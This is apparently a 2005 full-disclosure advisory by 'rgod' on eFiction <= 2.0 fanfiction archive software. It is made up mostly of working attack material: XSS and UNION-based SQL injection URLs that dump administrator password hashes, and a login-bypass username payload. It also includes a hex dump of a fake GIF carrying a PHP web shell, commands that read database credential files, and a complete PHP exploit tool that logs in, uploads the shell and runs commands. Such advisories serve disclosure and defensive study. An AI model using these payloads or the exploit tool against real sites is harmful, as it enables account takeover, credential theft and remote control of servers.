
| Subject: | eFiction <= 2.0 multiple vulnerabilities |
|---|---|
| Date: | 25 Nov 2005 11:22:11 -0000 |
efiction <= 2.0 remote code execution / SQL injection / login bypass /
cross site scripting / path & information disclosure

software:
site: http://www.efiction.wallflowergirl.com/index.php
description: "Efiction is a software program that enables users to run
automated original or fanfiction archives on their websites. The program is
PHP and MySQL database driven and is released as open-source software."

i) xss:

efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>

on version 2.0, through sql injection:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

ii) if magic_quotes_gpc off -> SQL INJECTION:
you can see on screen any admin/user MD5 password hash

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

iii) if magic_quotes_gpc off -> Login bypass:
you can login as admin typing:

efiction 1.0:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 1.1:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 2.0:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/*
password: [nothing]

(d41d8cd98f00b204e9800998ecf8427e is the MD5 hash of [nothing], i.e. of the
empty string: the injected row carries that hash as its password column, so
an empty password matches it)

iv) remote code execution (1.0/1.1/2.0):

register, a temporary password will be sent to you by email, login, go to
"Manage Images" (or go to http://target/path/user.php?action=manageimages&upload=upload),
choose "Upload new image", upload a fake gif cmd.php like this (this is the
hexadecimal dump):

00000000:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4 GIF89a....÷..¤¶¤
00000010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4 ...ô..w..k.L...ô
00000020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00 .iw..ø.nb....g..
00000030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00 .4.u.....aÀ.....
00000040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00 .........?......
00000050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00 .....©.. .......
00000060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00 .o...........V..
00000070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72 ...<?php error_r
00000080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5f eporting(0);ini_
00000090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69 set("max_executi
000000a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74 on_time",0);syst
000000b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3f em($_GET[cmd]);?
000000c0:3e 38 00 00 e5 00 00 12 00 00 00 00 00 00 00 98 >8..å..........?
000000d0:01 00 cc 00 00 15 00 00 00 58 00 10 e6 00 04 12 ..Ì......X..æ...
000000e0:00 10 00 00 04 05 00 01 90 00 00 f6 00 00 77 00 ........?..ö..w.
000000f0:00 c8 00 10 d5 00 e8 f5 00 12 77 00 00 ff 00 13 .È..Õ.èõ..w..ÿ..
00000100:ff 00 6c ff 00 6c ff 00 74 6a 00 03 16 00 00 f4 ÿ.lÿ.lÿ.tj.....ô
00000110:00 00 77 00 00 c4 00 30 1e 00 75 e5 00 15 77 00 ..w..Ä.0..uå..w.
00000120:00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 dc ...............Ü
00000130:00 00 e7 00 00 12 00 00 00 70 00 01 59 00 00 18 ..ç......p..Y...
00000140:00 00 00 00 00 04 00 88 01 00 e8 05 00 12 01 00 .......?..è.....
00000150:00 6c 00 04 e3 00 42 12 00 6e 00 00 74 7e 00 30 .l..ã.B..n..t~.0
00000160:00 00 87 00 00 6e c0 00 74 00 00 ff 00 00 ff 00 ..?..nÀ.t..ÿ..ÿ.
00000170:00 ff 00 00 ff ff 00 d6 ff 00 32 ff 00 6e ff 00 .ÿ..ÿÿ.Öÿ.2ÿ.nÿ.
00000180:74 ff 00 6c ff 00 5b ff 00 e5 ff 00 77 00 00 53 tÿ.lÿ.[ÿ.åÿ.w..S
00000190:00 00 15 00 00 53 00 00 00 00 00 00 00 00 00 00 .....S..........
000001a0:00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 ................
000001b0:00 6b 00 00 00 00 00 00 00 00 00 00 00 58 00 00 .k...........X..
000001c0:03 00 f0 00 00 15 00 00 00 06 00 00 f6 00 00 e4 ..ð.........ö..ä
000001d0:00 00 77 00 00 0f 00 00 1e 00 00 e5 00 00 77 00 ..w........å..w.
000001e0:00 00 00 00 01 00 00 00 00 00 00 00 00 f8 74 00 .............øt.
000001f0:62 e7 00 01 12 00 00 00 00 00 c8 68 00 28 32 15 bç........Èh.(2.
00000200:e5 e6 00 77 77 a4 00 ff e5 00 ff 12 00 ff 00 00 åæ.ww¤.ÿå.ÿ..ÿ..
00000210:ff 00 00 6c 00 00 5b 00 00 e5 00 00 77 fc f8 36 ÿ..l..[..å..wüø6
00000220:f7 62 00 12 15 00 00 00 00 05 00 36 90 01 00 f6 ÷b.........6?..ö
00000230:00 00 77 00 00 c8 04 d8 d5 29 ed f5 e5 12 77 77 ..w..È.ØÕ)íõå.ww
00000240:00 ff 94 ff ff e7 ff ff 12 ff ff 00 ff 6a 64 00 .ÿ?ÿÿçÿÿ.ÿÿ.ÿjd.
00000250:16 2f 00 f4 e6 00 77 77 00 e0 00 9c 18 00 e8 e5 ./.ôæ.ww.à.?..èå
00000260:00 12 77 00 00 00 ff 4e 00 ff 21 15 ff 4c 00 ff ..w...ÿN.ÿ!.ÿL.ÿ
00000270:00 00 6f 7c 00 10 e8 00 e5 12 00 77 00 f8 00 7b ..o|..è.å..w.ø.{
00000280:62 00 e0 15 00 4e 00 00 00 00 98 b0 01 e8 e8 00 b.à..N....?°.èè.
00000290:12 12 00 00 00 64 98 6f 2f 10 10 e6 e5 e5 77 77 .....d?o/..æååww
000002a0:77 00 10 52 00 e4 e9 00 4e 12 00 00 00 61 20 c8 w..R.äé.N....a È
000002b0:00 02 ff 6c 4f ff 00 00 7f 69 00 1c 00 01 e9 61 ..ÿlOÿ..i....éa
000002c0:00 12 00 00 00 29 94 00 00 e7 00 00 12 00 00 00 .....)?..ç......
000002d0:00 00 00 6f 00 01 10 00 00 e5 00 00 77 00 a0 00 ...o.....å..w. .
000002e0:00 3a 00 00 50 00 00 00 00 00 00 01 00 30 00 00 .:..P........0..
000002f0:00 00 00 69 00 00 61 60 00 74 f1 00 74 15 00 69 ...i..a`.tñ.t..i
00000300:00 00 00 f0 00 00 aa 00 02 47 00 00 00 21 f9 04 ...ð..ª..G...!ù.
00000310:00 00 00 00 00 2c 00 00 00 00 01 00 01 00 07 08 .....,..........
00000320:04 00 01 04 04 00 3b                            ......;

you can craft a smaller gif, try it

the uploaded file is reachable at:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php (efiction 1.0/1.1)
or
http://[target]/[path_to_efiction]/stories/[user_id]/images/cmd.php (efiction 2.0)
ex:
http://[target]/[path_to_efiction]/stories/1/images/cmd.php
http://[target]/[path_to_efiction]/stories/2/images/cmd.php

now you can launch commands redirecting the output to a temporary file:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=ls%20-la>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database username & password:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../data/dbconfig.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database table prefix and various settings:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../config.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

notes:
in efiction 1.0/1.1 members are NOT allowed to upload images by default
in efiction 2.0 members are allowed to upload images by default
from efiction 1.1 on, when installing the script you can specify a different
table prefix, so try efiction_fanfiction_authors, etc.

v) path disclosure:
http://[target]/efiction/storyblock.php

vi) information disclosure:
mphhh...
http://[target]/[path]/phpinfo.php

vii) you can always check for an install.php or upgrade.php to perform some
actions on site/database

this is the exploit tool for iv):

<?php
# ---efiction20_xpl.php                                  15.19 17/11/2005    #
#                                                                            #
#                  eFiction <= 2.0 fake GIF Shell Upload                     #
#                              coded by rgod                                 #
#                     site: http://rgod.altervista.org                       #
#                                                                            #
#  usage: launch from Apache, fill in requested fields, then go!             #
#                                                                            #
#  Sun-Tzu: "If fighting is sure to result in victory, then you must fight,  #
#  even though the ruler forbid it; if fighting will not result in victory,  #
#  then you must not fight even at the ruler's bidding."                     #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** eFiction <= 2.0 remote commands xctn ********* </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {background-color:#111111; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; }
img {background-color: #FFFFFF !important}
input {background-color: #303030 !important}
option { background-color: #303030 !important}
textarea {background-color: #303030 !important}
input {color: #1CB081 !important}
option {color: #1CB081 !important}
textarea {color: #1CB081 !important}
checkbox {background-color: #303030 !important}
select {font-weight: normal; color: #1CB081; background-color: #303030;}
body {font-size: 8pt !important; background-color: #111111;}
body * {font-size: 8pt !important}
h1 {font-size: 0.8em !important}
h2 {font-size: 0.8em !important}
h3 {font-size: 0.8em !important}
h4,h5,h6 {font-size: 0.8em !important}
h1 font {font-size: 0.8em !important}
h2 font {font-size: 0.8em !important}
h3 font {font-size: 0.8em !important}
h4 font,h5 font,h6 font {font-size: 0.8em !important}
* {font-style: normal !important}
*{text-decoration: none !important}
a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; }
a:hover{text-decoration: underline; color : #999933; }
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}
-->
</style></head><body><p class="Stile6"> ********* eFiction <= 2.0 remote commands xctn **********</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.htmlspecialchars($_SERVER['PHP_SELF']).'">
<p><input type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com) </span></p>
<p><input type="text" name="path"> <span class="Stile5">* path (ex: /efiction/ or just / ) </span></p>
<p><input type="text" name="command"> <span class="Stile5"> * specify a command , "cat ../../../data/dbconfig.php" to see database user & password </span></p>
<p><input type="text" name="username"><span class="Stile5"> * username...</span> </p>
<p> <input type="password" name="password"><span class="Stile5">* ... and password to eFiction, required to upload the fake gif </span> </p>
<p> <input type="text" name="port"> <span class="Stile5">specify a port other than 80 ( default value )</span> </p>
<p> <input type="text" name="proxy"><span class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p>
</form></td></tr></table></body></html>';

// hex dump of a packet, 16 bytes per row with the raw bytes alongside
function show($headeri)
{
  $ii=0;
  $ji=0;
  $ki=0;
  $ci=0;
  echo '<table border="0"><tr>';
  while ($ii <= strlen($headeri)-1)
  {
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
                 $ji=0;
                 $ci++;
                 echo "<td>&nbsp;&nbsp;</td>";
                 for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
                      }
                 $ki=$ki+16;
                 echo "</tr><tr>";
                }
    if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";}
    $ii++;
    $ji++;
  }
  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
      { echo "<td>&nbsp;&nbsp;</td>";
      }
  for ($li=$ci*16; $li<strlen($headeri); $li++)   // was <=, which read one byte past the end
      { echo "<td>".$headeri[$li]."</td>";
      }
  echo "</tr></table>";
}

// bracket-style delimiters: PCRE accepts ( ) around the pattern
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not, load
                      //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket === false) {
    echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "<br>";
  }
  else
  {
    echo "OK.<br>";
    if ($proxy=='') {
      echo "Attempting to connect to ".$host." on port ".$port."...<br>";
      $result = socket_connect($socket, gethostbyname($host), $port);
    }
    else {
      // validate the proxy only when one was given (the original checked it
      // unconditionally, so an empty proxy field made it die)
      if (!preg_match($proxy_regex,$proxy)) {echo 'Not a valid proxy...'; die;}
      $parts = explode(':',$proxy);
      echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
      $result = socket_connect($socket, $parts[0], (int)$parts[1]);
    }
    if ($result === false) {
      echo "socket_connect() failed.\r\nReason: " . socket_strerror(socket_last_error($socket)) . "<br><br>";
    }
    else {
      echo "OK.<br><br>";
      $html= '';
      socket_write($socket, $packet, strlen($packet));
      echo "Reading response:<br>";
      while ($out= socket_read($socket, 2048)) {$html.=$out;}
      echo nl2br(htmlentities($html));
      echo "Closing socket...";
      socket_close($socket);
    }
  }
}

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) { echo 'No response from '.htmlentities($host); die; }
  }
  else {
    if (!preg_match($proxy_regex,$proxy)) {echo 'Not a valid proxy...'; die;}
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],(int)$parts[1]);
    if (!$ock) { echo 'No response from proxy...'; die; }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) { $html.=fgets($ock); }
  }
  else {
    // through a proxy read byte by byte until EOF and the end of the headers
    $html='';
    while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) { $html.=fread($ock,1); }
  }
  fclose($ock);
  echo nl2br(htmlentities($html));
}

$host=$_POST['host'] ?? '';          $path=$_POST['path'] ?? '';
$username=$_POST['username'] ?? '';  $password=$_POST['password'] ?? '';
$port=$_POST['port'] ?? '';          $command=$_POST['command'] ?? '';
$proxy=$_POST['proxy'] ?? '';

if (($host<>'') and ($path<>'') and ($username<>'') and ($password<>'') and ($command<>''))
{
  $port=intval(trim($port));
  if ($port==0) {$port=80;}
  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);

  #STEP 1 -> Login
  $boundary='---------------------------7d53102423092a';
  $data ='--'.$boundary."\r\n";
  $data.='Content-Disposition: form-data; name="penname"'."\r\n\r\n".$username."\r\n";
  $data.='--'.$boundary."\r\n";
  $data.='Content-Disposition: form-data; name="password"'."\r\n\r\n".$password."\r\n";
  $data.='--'.$boundary."\r\n";
  $data.='Content-Disposition: form-data; name="submit"'."\r\n\r\n".'Submit'."\r\n";
  $data.='--'.$boundary."--\r\n";
  $packet="POST ".$p."user.php HTTP/1.1\r\n";
  $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
  $packet.="Referer: http://".$host.":".$port.$path."user.php\r\n";
  $packet.="Accept-Language: en\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
  $packet.="Accept-Encoding: text/plain\r\n";
  $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  $packet.="Host: ".$host.":".$port."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cache-Control: no-cache\r\n\r\n";
  $packet.=$data;
  show($packet);
  sendpacketii($packet);
  $temp=explode("Set-Cookie: ",$html);
  if (count($temp)<2) {echo '<br>Login failed: no session cookie in the response'; die;}
  $temp2=explode(' ',$temp[1]);
  $COOKIE=$temp2[0];
  echo '<br>Your cookie: '.htmlentities($COOKIE);

  #STEP 2 -> Upload a shell...
  # the fake gif, same bytes as the hexadecimal dump in iv) (offsets as comments)
  $SHELL = hex2bin(
    '47494638396101000100f70000a4b6a4'.   # 00000000  GIF89a, 1x1, 256-colour global palette
    '160000f400007700006b004c150000f4'.   # 00000010
    '0069770000f8006e6200001500670000'.   # 00000020
    '00340075000000000061c00000000000'.   # 00000030
    '0000000000000000008900001c000000'.   # 00000040
    '0000000000a900002000000000000000'.   # 00000050
    '006f0000000000000000000000560000'.   # 00000060
    '0000003c3f706870206572726f725f72'.   # 00000070  <?php error_r
    '65706f7274696e672830293b696e695f'.   # 00000080  eporting(0);ini_
    '73657428226d61785f65786563757469'.   # 00000090  set("max_executi
    '6f6e5f74696d65222c30293b73797374'.   # 000000a0  on_time",0);syst
    '656d28245f4745545b636d645d293b3f'.   # 000000b0  em($_GET[cmd]);?
    '3e380000e50000120000000000000098'.   # 000000c0  >
    '0100cc000015000000580010e6000412'.   # 000000d0
    '0010000004050001900000f600007700'.   # 000000e0
    '00c80010d500e8f50012770000ff0013'.   # 000000f0
    'ff006cff006cff00746a0003160000f4'.   # 00000100
    '0000770000c400301e0075e500157700'.   # 00000110
    '000000000000001500000000000000dc'.   # 00000120
    '0000e700001200000070000159000018'.   # 00000130
    '00000000000400880100e80500120100'.   # 00000140
    '006c0004e3004212006e0000747e0030'.   # 00000150
    '00008700006ec000740000ff0000ff00'.   # 00000160
    '00ff0000ffff00d6ff0032ff006eff00'.   # 00000170
    '74ff006cff005bff00e5ff0077000053'.   # 00000180
    '00001500005300000000000000000000'.   # 00000190
    '00000000000000070000000000000000'.   # 000001a0
    '006b0000000000000000000000580000'.   # 000001b0
    '0300f0000015000000060000f60000e4'.   # 000001c0
    '00007700000f00001e0000e500007700'.   # 000001d0
    '00000000010000000000000000f87400'.   # 000001e0
    '62e70001120000000000c86800283215'.   # 000001f0
    'e5e6007777a400ffe500ff1200ff0000'.   # 00000200
    'ff00006c00005b0000e5000077fcf836'.   # 00000210
    'f76200121500000000050036900100f6'.   # 00000220
    '0000770000c804d8d529edf5e5127777'.   # 00000230
    '00ff94ffffe7ffff12ffff00ff6a6400'.   # 00000240
    '162f00f4e600777700e0009c1800e8e5'.   # 00000250
    '001277000000ff4e00ff2115ff4c00ff'.   # 00000260
    '00006f7c0010e800e512007700f8007b'.   # 00000270
    '6200e015004e0000000098b001e8e800'.   # 00000280
    '121200000064986f2f1010e6e5e57777'.   # 00000290
    '7700105200e4e9004e120000006120c8'.   # 000002a0
    '0002ff6c4fff00007f69001c0001e961'.   # 000002b0
    '001200000029940000e7000012000000'.   # 000002c0
    '0000006f0001100000e500007700a000'.   # 000002d0
    '003a0000500000000000000100300000'.   # 000002e0
    '00000069000061600074f10074150069'.   # 000002f0
    '000000f00000aa00024700000021f904'.   # 00000300  graphic control extension
    '00000000002c00000000010001000708'.   # 00000310  image descriptor, LZW min code 8
    '0400010404003b00'                    # 00000320  one pixel, trailer
  );
  $boundary='---------------------------7d529a1d23092a';
  $data ='--'.$boundary."\r\n";
  $data.='Content-Disposition: form-data; name="upfile"; filename="C:\suntzu.php"'."\r\n";
  $data.='Content-Type: image/gif'."\r\n\r\n";
  $data.=$SHELL."\r\n";
  $data.='--'.$boundary."\r\n";
  $data.='Content-Disposition: form-data; name="submit"'."\r\n\r\n".'upload'."\r\n";
  $data.='--'.$boundary."--\r\n";
  $packet="POST ".$p."user.php?action=manageimages&upload=upload HTTP/1.1\r\n";
  $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
  $packet.="Referer: http://".$host.":".$port.$path."user.php?action=manageimages&upload=upload\r\n";
  $packet.="Accept-Language: en\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
  $packet.="Accept-Encoding: text/plain\r\n";
  $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  $packet.="Host: ".$host.":".$port."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Cookie: ".$COOKIE."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cache-Control: no-cache\r\n\r\n";
  $packet.=$data;
  show($packet);
  sendpacketii($packet);

  #STEP 3 -> Launch commands...
  $packet="GET ".$p."stories/".$username."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
  $packet.="Host: ".$host.":".$port."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  // the shell is served by PHP, so the GIF header bytes come back in front of the command output
  if (stripos($html,"GIF89")!==false) {echo "Exploit succeeded..."; die;}
  else {echo "Trying STEP 4...";}

  #STEP 4 -> If Step 3 failed... maybe this is efiction 2.0, cycling GET requests...
  for ($i=1; $i<=100; $i++)
  {
    $packet="GET ".$p."stories/".$i."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (stripos($html,"GIF89")!==false) {echo "Exploit succeeded..."; die;}
  }
  //if you are here...
  echo "Exploit failed...<br>";
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
?>

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/efiction2_xpl.html